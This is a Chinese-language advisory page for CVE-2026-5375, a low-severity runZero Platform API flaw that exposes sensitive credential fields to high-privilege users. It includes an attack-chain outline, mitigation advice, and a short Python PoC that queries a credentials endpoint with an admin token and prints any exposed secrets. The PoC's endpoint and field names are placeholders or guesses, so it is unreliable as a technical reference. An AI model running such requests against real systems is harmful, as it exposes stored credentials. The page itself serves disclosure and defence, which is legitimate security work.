CVE-2026-5375 CVSS 2.7 低危

CVE-2026-5375 runZero平台API敏感信息泄露漏洞

披露日期: 2026-04-07

来源: 44488dab-36db-4358-99f9-bc116477f914

漏洞信息

漏洞编号

CVE-2026-5375

漏洞类型

信息泄露

CVSS评分

2.7 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

runZero Platform

漏洞概述

runZero Platform 的 API 接口存在敏感信息泄露漏洞。拥有凭证访问权限的攻击者可以通过 API 响应查看到本应受限的敏感字段。该漏洞被归类为 CWE-200，CVSS v3.1 评分为 2.7，属于低危漏洞。尽管需要高权限才能利用，但成功利用可能导致机密性受损。官方已在版本 4.0.260203.0 中修复了此问题。

技术细节

该漏洞发生在 runZero Platform 处理 API 响应的逻辑中。由于服务器端未对返回给客户端的数据进行严格的字段过滤，导致具有高权限（PR:H）的用户在调用特定 API 时，能够获取到包含敏感信息（如凭证详情）的完整 JSON 响应。攻击者无需用户交互（UI:N），只需通过网络（AV:N）发送经过认证的请求即可触发。虽然该漏洞不影响系统的完整性和可用性，但泄露的敏感信息可能被用于后续的攻击链中，增加横向移动的风险。根本原因在于缺乏最小权限原则在 API 数据层面的实现。

攻击链分析

STEP 1

侦察

攻击者确定目标 runZero 平台的 API 端点，并获取有效的管理员或高权限用户凭证。

STEP 2

认证

攻击者使用获取的高权限凭证向 API 服务发起认证请求，获取访问令牌。

STEP 3

利用

攻击者构造特定的 API 请求，查询凭证信息或相关敏感资源。

STEP 4

信息泄露

服务器返回包含未脱敏敏感字段的 JSON 数据，攻击者解析响应并获取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target API endpoint (Example)
target_url = "https://<runzero-host>/api/v1/credentials"

# Headers with authentication
headers = {
    "Authorization": "Bearer <ADMIN_TOKEN>",
    "Accept": "application/json"
}

try:
    # Send GET request to retrieve credential information
    response = requests.get(target_url, headers=headers, timeout=10)
    
    if response.status_code == 200:
        data = response.json()
        # Check for sensitive fields exposure
        if 'sensitive_data' in data or 'secret' in data:
            print("[+] Vulnerability Confirmed: Sensitive data exposed in API response.")
            print(f"[+] Data: {data}")
        else:
            print("[-] Sensitive data not found in response.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except Exception as e:
    print(f"Error: {e}")

影响范围

runZero Platform < 4.0.260203.0

防御指南

临时缓解措施

如果无法立即升级，建议在 API 网关或 WAF 层面配置响应过滤规则，自动检测并脱敏包含敏感关键字的响应数据。同时，加强对高权限账号的监控，定期轮换 API 密钥。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表